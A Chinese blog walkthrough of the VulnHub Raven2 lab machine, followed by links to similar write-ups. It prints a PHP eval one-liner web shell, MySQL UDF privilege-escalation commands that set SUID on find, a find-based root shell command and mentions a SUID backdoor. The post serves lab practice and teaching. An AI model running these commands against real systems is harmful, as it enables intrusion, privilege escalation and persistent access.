vulnhub打靶--raven2

最新推荐文章于 2024-03-18 08:33:36 发布
最新推荐文章于 2024-03-18 08:33:36 发布
阅读量107 收藏
点赞数 1
分类专栏: vulnhub 信息安全 文章标签: 网络安全 web安全 信息安全 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52920608/article/details/131852048
版权

目录

vulnhub打靶–raven2

因为做过raven1了,raven2的wp有些重复的地方可能写的不清楚
可以看一下我上一篇raven1
Raven1–WP
Raven2下载

1.nmap扫ip

2.扫目录(wpscan会发现两个用户,没啥用,ssh连不上的)

3.打开/vendor/发现phpmailer

在这里插入图片描述
在这里插入图片描述

4.利用phpmailer公开exp打下

用的是4094.py
在这里插入图片描述
具体怎么用不说了,多看它exp里面注释

5.nc反弹shell ,可以使用echo写一个一句话进去,蚁剑连接后网站配置文件处发现数据库用户密码

eho '<?php @eval($_POST["cmd"]); ?>' >> file.php

在这里插入图片描述

6.连接数据库,发现可以使用udf提权

root用户,可以导入导出,版本较低

在这里插入图片描述
在这里插入图片描述
可以使用udf提权
上传脚本(同样使用searchexploit找)
在这里插入图片描述

7.udf提权步骤

具体命令

1..so库文件导出到plugin目录下
    select load_file('/tmp/udf2.so') into dumpfile '/usr/lib/mysql/plugin/udf.so';
	
2.创建自定义函数
	create function do_system returns integer soname 'udf.so';
		
#查询自定义函数是否创建成功
	select * from mysql.func;
#创建一个uid获取root shell的方式
	select do_system('chmod u+s /usr/bin/find');
#suid提权
	find shell.php -exec /bin/bash  -p \;   #shell.php是随便一个存在的文件名,或者touch创建一个

8.留个suid后门

在这里插入图片描述
提权,拿到root
在这里插入图片描述

9.总结

感觉确实比上个要难一些。思路很多,综合性很强。

首先wpscan发现用户之后可以爆破
爆破失败后再根据其他信息拿shell,这里是phpmailer命令执行
再看他网站配置文件发现数据库密码,登进数据库
这里可以查数据库数据发现两个用户密码,拿去撞库,其中steven是可以撞出来。
但是它不允许ssh密码登录(应该是用RSA密钥,这里不太了解怎么配)
想到数据库运行用户为root,且它的mysql版本不高,能导入导出。尝试udf提权,提权成功拿下root权限

最后再次感觉到思路很重要

XXX_WXY
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
meteor-accounts-raven:Meteor 的 Raven 身份验证
05-30
2. 配置Raven:设置Raven的认证后端,例如数据库连接和其他认证相关的配置。 3. 创建用户服务:使用提供的API创建用户、验证密码、发送验证邮件等。 4. 集成认证:在路由和方法中添加权限检查,确保只有登录用户...
raven-repository:Raven R 包快照存储库
06-09
raven-repository 版本化 R 包的元存储库=== 您可以在 openshift 上部署自己的快照存储库; 注册 openshift 并下载rhc工具,然后(这里我将应用程序命名为raven ): rhc app create raven diy # Create ...
vulnhub靶场--Raven靶场
zzzzzzkeai的博客
12-08 378
vulnhub靶场--Raven靶场
3-VulnHub-Raven 2
尼德霍格007
07-08 350
VulnHub-Raven: 2 靶机地址:https://www.vulnhub.com/entry/raven-2,269/ 目标:找到四个flag.txt信息 作者:尼德霍格007 时间:2021-7-8 准备工作:kali虚拟机(NAT),raven2虚拟机(NAT) 一、信息收集 首先要确定目标机IP地址,nmap扫描 $ nmap -sP 192.168.21.0/24 之后查看开放端口,全端口扫描 可以看到目标机开放了22端口(SSH),80端口(HTTP)和两个其他端口(我不知道是干嘛
vulnhub-Raven2
LuckySec
12-03 845
0x01 靶场简介 Raven 2是中级boot2root VM, 有4个flag需要搜集,在多次被攻破后,Raven Security 采取了额外的措施来加固其Web服务器,以防止黑客入侵。您是否仍然可以攻破Raven? 靶场下载:https://download.vulnhub.com/raven/Raven2.ova 0x02 靶场渗透 1. flag1 使用Nmap探测靶机IP地址 nmap -sP 192.168.126.0/24 确定IP地址后,扫描开放的端口和服务 Nmap -p 1-65
Vulnhub系列靶机-Raven2
来日可期的博客
10-14 651
MySQL >= 5.1 的版本,必须把 UDF 的动态链接库文件放置于 MySQL 安装目录下的 lib\plugin 文件夹下文件夹下才能创建自定义函数。MYSQL低于5.5的漏洞可以使用UDF提权,查看mysql的运行权限。发现是mysqld是root权限,查看secure_file_priv的设置发现为空,满足udf提权。通过以上信息可知满足udf提权,直接利用1518进行提权,先搜索1518.c,然后查看其所在位置,并复制到桌面。Web页面中也有发送邮件的位置,这样就对应上了。
靶机渗透-Vulnhub-Raven
dahege666的博客
08-18 188
靶机:raven IP:192.168.239.136 攻击机:Kali IP:192.168..239.131 1、Nmap探测目标端口和服务 2、先访问80端口,从web服务开始 3、菜单栏中BLOG路径为wordpress点击,可以判断是wordpressCMS 4、先用wpscan扫一下,wpscan --url http://192.168.239.136/wordpress/ -e u 得到两个用户 5、爆破两个用户的密码,和爆破ssh密码 最后爆破...
Vulnhub系列靶机---Raven2
qq_45953122的博客
10-13 834
用nc开启监听并访问http://192.168.160.47/sky.php 获得一个低级的shell。浏览器访问http://192.168.160.47/contact.php生成后门文件。需要提权,chmod修改权限后,再./LinEnum.sh执行。此时,/usr/bin/find 就具备了SUID 权限。
vulnhub打靶--raven
m0_52920608的博客
07-20 86
算是比较综合的环境,主要还是考察思路吧。最后他这里网站运行的数据库是root权限,有时间可以尝试UDF提权。
VulnHub-Raven
热门推荐
江左盟的博客
04-06 1万+
信息收集 使用nmap --min-rate 10000 -A 192.168.58.135 --script=vuln扫描目标主机,如图: 部分关键信息如下: Nmap scan report for 192.168.58.135 Host is up (0.00054s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8
Vulnhub - Raven2
最新发布
qq_46081990的博客
03-18 668
usr/lib/mysql/plugin/是因为当前权限是www-data,大概率是不够的,这里是通过MySQL的root用户权限将/tmp/udf.so导出到了/usr/lib/mysql/plugin/目录。得知当前MySQL版本为5.5.6>5.2,secure_file_priv为空代表可以写入,插件路径为/usr/lib/mysql/plugin/,综上所述,符合UDF提权条件。Kali开启nc监听4444端口,访问/shell.php,成功收到会话,权限为www-data。
raven-go:Go中的Sentry客户
02-03
掠夺 raven-go SDK已不再维护,已由sentry-go SDK取代。 在了解有关该项目的更多信息,并查看。 raven是事件/错误记录系统的官方Go SDK。安装go get github.com/getsentry/raven-go注意:支持Go 1.7及更高版本。
rq-11_raven.zip
04-26
STK官方3D模型,非安装文件自带的,模型丰富。先在我上传的资源中下载STK models目录,里面有模型的缩略图和描述,然后在我上传的资源中找相应的模型(文件名是模型名称的缩写,很容易对应)。经测试,从STK8.0到STK...
raven-for-redux:用于Redux的Raven中间件
02-05
。 不推荐使用 Sentry现在建议使用其新的SDK @sentry/browser而不是Raven。 请查看 ,以获取支持新SDK...npm install --save raven-for-redux 用法 浏览器 // store.js import Raven from "raven-js" ; // Or, you mig
kali设置中文
m0_52920608的博客
11-09 7388
kali汉化
CTFshow-web入门-命令执行
m0_52920608的博客
03-26 5312
CTFshow web入门 命令执行 ctfshowweb命令执行
Ctfhub - web -- SQL注入
m0_52920608的博客
01-28 3852
CTFHub sql注入 web mysql python脚本
FineCMS-v5.0.1漏洞审计
m0_52920608的博客
04-27 2603
FIneCMS漏洞审计
vulnhub靶机——raven: 2
09-03
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

XXX_WXY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值